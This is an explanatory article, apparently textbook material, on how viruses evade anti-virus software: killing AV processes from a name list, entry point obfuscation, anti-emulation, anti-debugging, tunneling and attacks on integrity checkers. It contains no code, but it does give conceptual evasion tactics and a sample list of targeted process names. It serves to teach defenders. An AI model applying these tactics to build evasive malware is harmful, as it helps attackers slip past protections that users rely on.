Anti-anti Virus Technique

All viruses self-replicate, but not all viruses act in an openly hostile way towards anti-virus software. Anti-anti-virus techniques are techniques used by viruses which do one of three things:

  1. Aggressively attack anti-virus software.
  2. Try to make analysis difficult for anti-virus researchers.
  3. Try to avoid being detected by anti-virus software, using knowledge of how anti-virus software works.

The lack of clear definitions in this field comes into play again: arguably, any of the encryption methods is an attempt to achieve the latter two goals. To further confuse matters, "anti-anti-virus" is different from "anti-virus virus."

Anti-virus virus has been used variously to describe: a virus that attacks other viruses; anti-virus software that propagates itself through viral means; software which drops viruses on a machine, then offers to sell "anti-virus" software to remove the viruses it put there.

Back to the relatively well-defined anti-anti-virus, this includes seven techniques: retroviruses, entry point obfuscation, anti-emulation, armoring, tunneling, integrity checker attacks, and avoidance.


A virus that actively tries to disable anti-virus software running on an infected machine is referred to as a retrovirus. This is a generic term for a virus employing this type of active defense, and doesn't imply that any particular technique is used.

Having said that, a common retrovirus technique is for a virus to carry a list with it of process names used by anti-virus products. When it infects a machine, a retrovirus will enumerate the currently-running processes, and kill off any processes which match one of the names in the list. A partial list is shown below:

Avgw.exe F-Prot.exe Navw32.exe Regedit.exe Scan32.exe Zonealarm.exe

It's not unusual to see lists like this appear in malware analyses. Thi particular list not only includes anti-virus process names, but also other security products like firewalls, and system utilities like the Windows Registry editor.

A more aggressive retrovirus can target the antivirus software on disk as well as in memory, so that antivirus protection is disabled even after the infected system is rebooted.

For example, Ganda kills processes that appear to be anti-virus software, using the above list-based method; it also examines the programs run at system startup, looking for anti-virus software using the same list of names.

If Ganda finds anti-virus software during this examination, it locates the executable image on disk and replaces the first instruction with a "return" instruction. This causes the anti-virus software to exit immediately after starting. The above methods have one major drawback: by killing off the anti-virus software, they leave a telltale sign.

An alert user might notice the absence of the anti-virus icon. For the purposes of retroviruses, it's sufficient to render anti-virus software incapable of full operation, disabling it rather than killing it off completely. How can this be done?

One approach would be to try and starve anti-virus software of CPU time. A retrovirus with appropriate permission could reduce the priority of anti-virus software to the minimum value possible, to (ideally) keep it from running.

Most operating system schedulers have a mechanism to boost the priority of CPU-starved processes," however, so attacking antivirus software by reducing process priority is unlikely to be very effective.

Another way to disable anti-virus software is to adjust the way a computer looks up hostname information on the network, to prevent anti-virus software from being able to connect to the anti-virus company's servers and update its database.

Entry Point Obfuscation

Modifying an executable's start address, or the code at the original start address, constitutes extremely suspicious behavior for anti-virus heuristics. A virus can try to get control elsewhere instead; this is called entry point obfuscation or EPO.

Picking a random location in an executable to gain control isn't a brilliant survival strategy, because a infrequently-executed error handler may be chosen as easily as a frequently-executed loop. A more controlled selection of a location is better.

Simile and Ganda both use EPO, and look for calls to the ExitProcess API function; these calls are overwritten to point to the viral code instead. Because ExitProcess is called when a program wants to quit, these viruses get control upon the infected code's exit. Locations for EPO may also be chosen by looking for known code sequences in executables.

Compilers for high-level languages emit repetitive code, and a virus can search the executable for such repetitive instruction sequences to overwrite with a jump to the virus' code. As the sequence being replaced is known, the virus can always restore and run the original instructions later.


Techniques to avoid anti-virus emulators can be divided into three categories, based on whether they try to outlast, outsmart, or overextend the emulator. The fix for the latter two categories is just to improve the emulator, although this tends to come at the cost of increased emulator complexity.


Except in an anti-virus lab, the amount of time an emulator has to spend running a program is strictly limited by the user's patience. How can a virus evade detection long enough for the emulator to give up?

  • Code can be added to the virus which does nothing, wasting time until the emulator quits - then the real viral code can run. The emulator may look for obvious junk code, so the code would need to be disguised as a valid operation, like computing the first n digits of ะป.
  • A virus need not replicate every time it's run. It can act benign nine times out of every ten, for example, in a statistical ploy to appear harmless 90% of the time. If the anti-virus software is using the performance-improving tricks, then the virus might get lucky and have an infected program be marked as clean when emulated; a later execution of that infected program would give the virus a free hand.
  • Emulators operate under the assumption that viral code will intercept execution at or near the start of an infected program. Entry point obfuscation, besides an anti-heuristic measure, can also be considered an anti-emulation technique, because it can delay execution of viral code.


An alternative to waiting until emulator scrutiny is over is to restructure the viral code so that it doesn't look suspicious when it's emulated. The decryptor code could be spread all over, instead of appearing as one tight loop; multiple decryption passes could be used to decrypt the virus body. Most techniques for avoiding dynamic heuristics would be candidates here.


A virus can push the boundaries of an emulator in an effort to either crash the emulator - not likely for a mature anti-virus emulator - or detect that the virus is being run under emulation, so that the virus can take appropriate (in)action. Here are some ways to try and overextend an emulator:

  • Some CPUs, especially CISC ones, have undocumented instructions. A virus can use these instructions in the hopes that an emulator will not support them, and thus give itself away.
  • The same idea can be applied to bugs that a CPU may exhibit, or differences between different processor implementations. The emulator may need to track results that are processor-dependent to correctly emulate such a virus.
  • The emulator's memory system can be exercised by trying to access unusual locations that, on a real machine, might cause a memory fault or access some memory-mapped I/O. A cruder attack may simply try to exhaust an emulator's memory by accessing lots of locations. Memory system attacks are not particularly effective, however.
  • Assuming emulators return fixed values for calls to many operating system and other API functions, a virus can check for differences between two calls of the same function where a change should occur. For example, a virus could ask for the current time twice, assuming an emulated environment will return the same value both times.
  • An emulator may be taxed by importing obscure, but standard, libraries in case the emulator doesn't handle all of them.
  • External resources are next to impossible to properly emulate. A virus could take advantage of this by looking for external things like web pages.
  • Finally, checks specific to certain emulators can be performed. An emulator may only support a well-known set of I/O devices, or may have an interface to the "outside world" which can be tested for.


A virus is said to be armored if it uses techniques which try to make analysis hard for anti-virus researchers. In particular, anti-debugging methods can be used against dynamic analysis, and anti-disassembly methods can be used to slow static analysis. Interestingly, these techniques have been in use since at least the 1980s to guard against software piracy.


Making dynamic analysis a painful process for humans is the realm of antidebugging. These techniques target peculiarities of how debuggers work. This is a last gasp, though - if the viral code is already being analyzed in a debugger, then its survival time is dwindling.

If the goal is to annoy the human analyst, then the best bet in survival terms is to follow a false trail when a debugger is detected, and avoid any viral behavior. There are three weak points in a debugger that can be used to detect its presence: idiosyncrasies, breakpoints, and single-stepping.

  • Debugger-specific idiosyncrasies. As with emulators, debuggers won't present a program being debugged with an environment identical to its normal environment, and a virus can look for quirks of known debuggers.
  • Debugger breakpoints. Debuggers implement breakpoints by modifying the program being debugged, inserting special breakpoint instructions at points where the debugger wants to regain control. Typical breakpoint instructions cause the CPU to trap to an interrupt service routine.

A virus can look for signs of debugging by being introspective: it can examine its own code for breakpoint instructions. Since the virus may use external library code where debugger breakpoints can be set, breakpoint instructions can also be looked for at the entry points to library API functions.

More generally, a virus can look for any changes to itself. From the virus' point of view, a change is an error, and there are two distinct possibilities for dealing with errors: error detection and error correction.

Error detection, like the use of checksums or CRCs, would tell the virus whether or not a change had occurred to it, and the virus could take action accordingly. On the other hand, error correction not only detects errors, but is able to repair a finite number of them.

A robust virus would imply the use of error correction over error detection - this would guard against transmission errors and keep casual would-be virus writers from modifying the virus, and also be able to remove debugger breakpoint instructions.

  • Single-stepping. Debuggers trace through code, instruction by instruction, using the single-stepping facilities available in many CPUs. After each instruction is executed, the CPU posts an interrupt which the debugger handles.


Any of the code obfuscation techniques used by polymorphic and metamorphic viruses are anti-disassembly techniques, but only in a weak sense. There are two goals for strong anti-disassembly:

  1. Disassembly should not be easily automated; the valuable time of an expert human should be required to make sense of the code.
  2. The full code should not be available until such time as the code actually runs.

To make automation difficult, a virus' code can make use of problems which are computationally very hard to solve. It turns out that the simple trick of mixing code and data is one such problem: precise separation of the two is known to be unsolvable.

In general, a virus may be structured so that separating code and data is also impossible - this can be done by using instructions as data values and vice versa. A careful mix of code and data may even throw off human analysis temporarily.

Anti-disassembly techniques are not solely for irritating human anti-virus researchers. They can also be seen as a defense against anti-virus software using static heuristics.


Anti-virus software may monitor calls to the operating system's API to watch for suspicious activity. A tunneling virus is one that traces through the code for API functions the virus uses, to ensure that execution will end up at the "right" place, i.e., the virus isn't being monitored.

If the virus does detect monitoring, tunneling allows the monitoring to be bypassed. An interesting symmetry is that the defensive technique in this case is exactly the same as the offensive technique: tracing through the API code.

The code "tracing" necessary for tunneling can be implemented by viruses in several ways, all of which resemble anti-virus techniques. A static analysis method would scan through the code, looking for control flow changes. Dynamic methods would single-step through the code being traced, or use fullblown emulation.

Tunneling can only be done when the code in question can be read, obviously. For operating systems without strong memory protection between user processes and the operating system, like MS-DOS, tunneling is an effective technique.

Many operating systems do distinguish between user space and kernel space, though, a barrier which is crossed by a trap-based operating system API. In other words, the kernel's code cannot be read by user processes.

Surprisingly, tunneling can still be useful, because most high-level programming languages don't call the operating system directly, but call small library stubs that do the dirty work - these stubs can be tunneled into.

Anti-virus software can dodge this issue if it installs itself into the operating system kernel. (This is also a desirable goal for viruses, because a virus in the kernel would control the machine completely.)

Integrity Checker

Attacks In terms of anti-anti-virus techniques, integrity checkers warrant some careful handling, because they are able to catch any file change at all, not just suspicious code. Stealth viruses have a big advantage against integrity checkers. A stealth virus can hide file changes completely, so the checker never sees them.

Companion viruses are effective against integrity checkers for the same reason, because no changes to the infected file are ever seen. Stealth viruses can also infect when a file is read, so the act of computing a checksum by an integrity checker will itself infect a file.

In that case, the viral code would be included in the checksum without any alarm being raised. Similarly, a "slow" virus can infect only when a file was about to be legitimately changed anyway.

The infection doesn't need to be immediate, so long as any alert that the integrity checker pops up appears soon after the legitimate change; a user is likely to dismiss the alert as a false positive.

Finally, integrity checkers may have flaws that can be exploited. In one classic case, deleting the integrity checker's database of checksums caused the checker to faithfully recompute checksums for all files!


Those who admit to remembering the Karate Kid movies will know that the best way to avoid a punch is not to be there. The same principle applies to anti-anti-virus techniques. A virus can hide in places where anti-virus software doesn't look.

If anti-virus software only checks the hard drive, infect USB keys and floppies; if anti-virus software doesn't examine all file types, infect those file types; if files with special names aren't checked, infect files with those names.

Unusual types of file archive formats may temporarily escape unpacking and scrutiny, too. In general, avoidance is not particularly effective as a strategy, though.